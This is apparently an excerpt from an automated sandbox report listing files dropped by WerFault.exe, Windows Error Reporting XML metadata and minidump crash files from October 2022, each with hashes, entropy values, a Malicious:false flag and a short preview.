                                                          MD5:91FDE7D985825C6B53117B791E07A8D6
                                                          SHA1:6E63C6405EB66F03F0E57F8D74A5148ED96140E1
                                                          SHA-256:87727A8CB08AD3D3BCAE74FF4772FA60C3EC1E090C7904808ADAA1800CC01485
                                                          SHA-512:476B9C91426CB92D40E605EEC2C8EAD01BF2456EDE71DC923C1C690F77C3AF4787A974C69F42577A53816A85358DAB6FF88A0FDF3D72965931C2234EDEC480C2
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5380</Pid> ...
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.4713509172613
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsRJgtWI9UqrWgc8sqYjr8fm8M4JbUZF/L+q86mYrZMjT4d:uITfjvqagrsqYkJw36YrZMX4d
                                                          MD5:7FC287076531EE62E457E6EEC8214486
                                                          SHA1:A5207F6E33E51F79CD11D765C86FA3093299F209
                                                          SHA-256:103C52FF99EF33CC62D2E11A5C99791DDB9FBA55C7C508A010114F8BADB0259C
                                                          SHA-512:282557C994C93FE9A680A449168296EB5958D84BF2F59929CAE215D3050BCAE2BC39233C5CBB2836956C42C5812528849FB0FC5FFF23D3BD6503406FA85E6BDF
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719942" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:08 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):64046
                                                          Entropy (8bit):2.33684318015984
                                                          Encrypted:false
                                                          SSDEEP:384:v/4MP40IYCYP/U1rCf6bgqhQ3qNLkk25GFvAR99mb:fP40ZarCzqhaGokPFU9mb
                                                          MD5:F7B153CFEC0ACEBD1ED8B70D17B9340A
                                                          SHA1:48D7C4201CFF584735B9C4CA6280025D5844D3E7
                                                          SHA-256:421C3361B597466600388ABB822CD80C53C26767F43BB6E780AB9169BC74569C
                                                          SHA-512:B8C9B151D38BD7A41F3BCA0B1CD6241E3B2144F78D1C10FE380310D17697860CB83E1B62D124E4ACC08DF3FE9E433E3C6DFEFB6E7218AF976B32A713002C65D2
                                                          Malicious:false
                                                          Preview:MDMP (minidump; non-printable bytes omitted) ... GenuineIntel ... Pacific Standard Time ... Pacific Daylight Time ... 17134.1.x86fre.rs4_release.180410-1804
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8324
                                                          Entropy (8bit):3.7010978056776356
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Ct6L+6Yq+SUkOgmfB0SeBCpBSV89b0Esf08m:RrlsNiD6i6YzSUkOgmfOSF03fm
                                                          MD5:EB101CCD26A52D0C7114A3B08B5B2A61
                                                          SHA1:D147122AB36D17CCAC10415460C66ECC49D03B24
                                                          SHA-256:BD0CE9164045F5392DD9801F34E4945553D87D1D7426240A9649809A70AD99AB
                                                          SHA-512:09A272B3414EDCB44239CB384FCA55831DFA00A8F4BEAEBFE3F2983B071D0E34AA3AE5AA530A2C38A3A677EEDFC2449D685CA658E0C94A3F11619122F2566C52
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5380</Pid> ...
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.472013890568415
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsRJgtWI9UqrWgc8sqYjN8fm8M4JbUZF16+q86mYrZMjT4d:uITfjvqagrsqYOJwR66YrZMX4d
                                                          MD5:F6B7E8F49AA43131D5EFFE56976643C8
                                                          SHA1:5D6EAC7D7B6F1AE18693722E322D62A378C2B1B0
                                                          SHA-256:B5AA1C5B25A6B847C96489F63F383F9F09B8A22D55B40D67A82DA7B33163082C
                                                          SHA-512:9095864257890171CE0E51C39D646D074BE79CFE2A47434CB84A9C8D309D156F7657ABB9ED403BBA3633ED729CADCB95717BB08A42F5B1E05C22D57078985026
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719942" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:10 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):79800
                                                          Entropy (8bit):2.028796625566219
                                                          Encrypted:false
                                                          SSDEEP:384:MHuAw4ylPerdhnFJG4vB/qk/PzKhQ3qNLkk25GhgDUh:nA2PeRhV1P+haGokPEUh
                                                          MD5:C010EA8A0634D8BA3D4021BA5211D5BC
                                                          SHA1:573532933C5B3D3DD2E297F58976BBE087485AFA
                                                          SHA-256:D6134E749C4815BB253D650AC1B4EF97A7DC9405D00898E6F91DF02E434651E4
                                                          SHA-512:2F2539BA26FA51109843B938B1E8AD9F8136B850DFAF9B429F1CF807B4038DB4BDD8FD5701204F7A7917EDDBD571E52C83CDECF20F42FA85863B9FD4A784D0B5
                                                          Malicious:false
                                                          Preview:MDMP (minidump; non-printable bytes omitted) ... GenuineIntel ... Pacific Standard Time ... Pacific Daylight Time ... 17134.1.x86fre.rs4_release.180410-1804
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8326
                                                          Entropy (8bit):3.7040721630788607
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Cj+6a6Yq6SUYAgmfB0SeBCpB189bdEsf8fm:RrlsNid+6a6Y3SUYAgmfOSmd3fJ
                                                          MD5:99229F3B9EC8CACF8B0E3AF707C090DD
                                                          SHA1:B5BBB092893720A437166FAB783097709D1B639C
                                                          SHA-256:50DC2208A954F29C6C8ABEA57808F44601978AB6CE0E4E4FCEF550C967BA9423
                                                          SHA-512:D217BA7EC0F6963B04305D2C9EA8E9B0213005F5ECEC22E5AAEC8BD2D5D57A1CC59CF8B7C107FD831CD3E5FE30BC588C7FA45520257566D2316E0BE115712BD3
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5380</Pid> ...
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.470885526084952
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsRJgtWI9UqrWgc8sqYjA8fm8M4JbUZFy+An7+q86mYrZMjT4d:uITfjvqagrsqYpJw/a76YrZMX4d
                                                          MD5:5853C04112C7D101464A80E9911823D8
                                                          SHA1:0C751F203D0528683B5CA00B4F8B0B91DEA0D043
                                                          SHA-256:98A3125A6DBE881651C2F5B5AB942A5FDF41FFA5CA8670EEE563316C38392537
                                                          SHA-512:B1AE36D59CCBF2D35B85F2D79BBCEB458539B17ABC853FDE833999E7AF69754FB04CFE2672E9389F9FF09F14D1E20441B4A94EF76C89F639D7FDAC14AC1438CF
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719942" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:13 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):79260
                                                          Entropy (8bit):2.043851295321239
                                                          Encrypted:false
                                                          SSDEEP:384:ZaAw4xnkPORZwt2PV74vBNqkYPSKhQ3qNLkk2ZGDIanedh:QAlkPORZc2yMPXhaGokbwdh
                                                          MD5:934E60D0897B97BCFB63AF232B0936C7
                                                          SHA1:9E8CCAB034A3F18F6F23D039AE789897A0490D6E
                                                          SHA-256:A803A868276950AEFF0530C4340B02ADD05567254E00E9DE50DA043C4AE38362
                                                          SHA-512:F1E7130FE456E30744CD59DABAFE58D76BA3E86E5DF6C82FCD3A1926881AC27971551D1C7D3E73913ED7EA2A206796BF811F775EFC8ABBAA625CED53FA100B93
                                                          Malicious:false
                                                          Preview:MDMP (minidump; non-printable bytes omitted) ... GenuineIntel ... Pacific Standard Time ... Pacific Daylight Time ... 17134.1.x86fre.rs4_release.180410-1804
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8326
                                                          Entropy (8bit):3.7003878701766695
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Cy6z6YqoSU2DgmfB0SeBCpBB89bGEsfvCm:RrlsNiM6z6YlSU2DgmfOSKG3fr
                                                          MD5:3DAE7B32A2A393D20635E02AFFF0998E
                                                          SHA1:F963C42C10FB42E885A53A9D70FFA9A845ED4E9C
                                                          SHA-256:F0A07E8BFE0E67E09CF9FC22C3A116AF04D557E193D50986896E9B909ACC9218
                                                          SHA-512:9F7C92EB47661D34B01AF78FE47AB8FCE8D5BE3C1CCA49F2FF22E963A7C86D164EB098313EBD5B085D0B347FBDE2917EDCB06F5F99C00145DDBFD098474DEB2B
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>5380</Pid> ...
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.470253258197518
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsRJgtWI9UqrWgc8sqYjqK/8fm8M4JbUZF/+q86mYrZMjT4d:uITfjvqagrsqYlkJwD6YrZMX4d
                                                          MD5:A2D968C7066562D3C0C554DC56259D0B
                                                          SHA1:2804EEED188AF4DB05B2CBDFC5189136A98C743B
                                                          SHA-256:2AEFAD63EF21C9EBFFAAC8109A29BBE3F684CAABD90F079F5DB3CC1E8E2712AA
                                                          SHA-512:6DB4398F180ACCD4FADD58C93E025DCFDA64A3ECA317619CF625F67C97025F9A0F9D7C1ACA6F189B47A2A71BFCDA0A3238562707D67C135587615CBF93B34185
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719942" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:33:26 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):112722
                                                          Entropy (8bit):2.0591438878706567
                                                          Encrypted:false
                                                          SSDEEP:384:RBMoyPHPwPZ8zNAjGOMvDbVqfTY9aeyqNL8H2eGoXA/+TPZ8FfuNmcE7XdV9d/d:oPFNAkMYryGAHIoJE7N
                                                          MD5:C0ABF883DE8CA88D30E561D728EE0ADA
                                                          SHA1:42A484F64C4C1E8548F9746B774D0F8A959803F3
                                                          SHA-256:DC0842291C67C964B6B4C9A10A5E09980A144BF1AE2F2E2B1737596CF1A730AE
                                                          SHA-512:9A15AB3661BBC9D4A495FA333651C6030217FCFD3BAEC95F12F2A32A1EFA6FE6140F5FE8B7EC7A634522BBD98E717AE2ED9AB563CD9AB493940E554D770F83CA
                                                          Malicious:false
                                                          Preview:MDMP....... .......V.;c............D...............L...........LM..........T.......8...........T........... ;..2}........... ..........."...................................................................U...........B......."......GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:20 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):79292
                                                          Entropy (8bit):2.0847780570262655
                                                          Encrypted:false
                                                          SSDEEP:384:yeAw4wMhPCzZUV7jFvBUqkYPHehQ3qNLkk25GO8K0hw3PQW:pAfPCzIFBP+haGokPQ0hw3P
                                                          MD5:F212FF51EE38B4D31D2AAE1E0D90A2B5
                                                          SHA1:58463935BFA2EE61338020546D21A4E1F4C0E91A
                                                          SHA-256:4297FD8421CCE432513AFA02430CD875A91229C86D599FF6504DF0062D5EA5B5
                                                          SHA-512:7D7033DB86A49B71E16F88C5653AB120B37587C3E509E389752C3B091D6FB2C2C752B9F4C2D8447EA65BE55D81109A937EF4A35B100B4AEFE9E648203D9B1B46
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c........................4................7..........T.......8...........T............................................................................................................U...........B......D.......GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8326
                                                          Entropy (8bit):3.7033457187750933
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Ce6p6YqmQSUVTgmfB0SeBCpBq89bOEsf66m:RrlsNiQ6p6Y9QSUVTgmfOSXO3f+
                                                          MD5:16EEAA4B3326849450F4817162A745C5
                                                          SHA1:1A6365771D038FC1041C32E0FC2A308355466155
                                                          SHA-256:28AD7E83812A14E5D9D5B6AB59407F48BF0E20C74217C370AE3805633CEBFA5B
                                                          SHA-512:55F89FEE3EA58A35B14120139DE643F690E3FD1AF7E80ECCCF091FBD8AF5D7DF4D9BB0EC71A914AB1821462BE443351F92009A8EC8329369FE25D481BC424EBF
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.469699590985047
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsRJgtWI9UqrWgc8sqYjN8fm8M4JbUZFt+q86mYrZMjT4d:uITfjvqagrsqY+Jwx6YrZMX4d
                                                          MD5:4846B810F3F30A775E63E4EE6F3C95C3
                                                          SHA1:CBA2B21637A19FA1DA515B3B5F475528CD86A967
                                                          SHA-256:A7546014200D6A93E9357E5E2EEC488A5A0313346CE2D4430335B60D533F753F
                                                          SHA-512:1A6AA0AFBE5828B962399B9147E6623541CE7665D451CF176B7A30052C0C3F6D3BFA4CC3D77A90F033210036BFC21915C929D36DD5BFBF103835B478A59E9C08
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719942" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8338
                                                          Entropy (8bit):3.700809895921402
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Ch6PO66YqCSUs4ggmfBnSR1aBCpBM89bpEsf1Dm:RrlsNiv6L6YPSUMgmfBSTJp3fs
                                                          MD5:A143CDBC5C625A98DD040606E5AE9ECA
                                                          SHA1:6811091944DB4DCA934D3F75D537E858C3A52655
                                                          SHA-256:B633BF27E6595F2EC6621FA0C10A47BDAA2B4747D5F8D9DC944EA417478B17D5
                                                          SHA-512:4D16CE2DCE89E2ED8C0DFC5463A3BE61014BBB32756EF0DD00532EDD37E05E211C7357F5BCDC540754A5113193DEBDAD29E54C515034501A6790F26132243359
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.470694493480002
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsgiJgtWI9UqrWgc8sqYjl8fm8M4JbRZFPss+q8JmYrZMjT4d:uITfgwvqagrsqYGJ9L3YrZMX4d
                                                          MD5:FB37F1F09DEBCB91F32273D0B7C179AE
                                                          SHA1:517ECF53279353A97C6535F238D9882F61FC4398
                                                          SHA-256:62BB8C1638AFA7EA7E5A39EED9CEB8F9C1DE4383C6A5A0B470E7A923DDEDF5A8
                                                          SHA-512:D9F881062A8D9C32E57D9B2A972293E71601D9686A55D2288F77CBE2D29B013048ADC0C6ED1E6FF6EA13BAAAF94A53085FB1F54714DE3A671BF6185360B01A2D
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719944" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:23 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):85970
                                                          Entropy (8bit):2.043184900863757
                                                          Encrypted:false
                                                          SSDEEP:384:UDkjX7XPFUDyCvBJqcYPGt93qNLkH2CGCpPnCy+YT:UCX7XPWBIPYGoHMaCwT
                                                          MD5:A878D36D0648EA35F5883DA30AFBBBC3
                                                          SHA1:3CDD8C0B168CB4C53B0F296F5EDA5870E10E79E3
                                                          SHA-256:96A919B80C8D1A4A41641B1750171DA12FC9F2AEC90BEE6D35B950676757E977
                                                          SHA-512:5F0BB6C4A5E4D3937E72024AF1712A19F287F2B091F353E426FFDFD179D608EF382871176643C31849E3685A9194D2CFB2366EDBA8AD1B91443C17F1E2326C57
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c........................x...............H<..........T.......8...........T...........P$...+..........4........... ....................................................................U...........B..............GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8330
                                                          Entropy (8bit):3.701999164799548
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6CD6IkW6YqWSUYsgmfB0SeBCpBG89bqEsfOum:RrlsNit6IkW6YbSUYsgmfOSLq3f+
                                                          MD5:18B0CE3057D005D22F8C210B16C96C8D
                                                          SHA1:AA979E74A802666AD8F3878B8582AFD6E30B507B
                                                          SHA-256:A670EF8079D00859411DFBD5BB8EF08C105E50753F6DC5914E9FAA30A567DF00
                                                          SHA-512:A3447ACC171AED50EE9D577AE114D7BF38549F4177425C4CBF1D0128528788E3DE387A1ABB4C76CC1F0A5817BDDCE758D42F8CAC06D28266E32FE1CC6183C015
                                                          Malicious:false
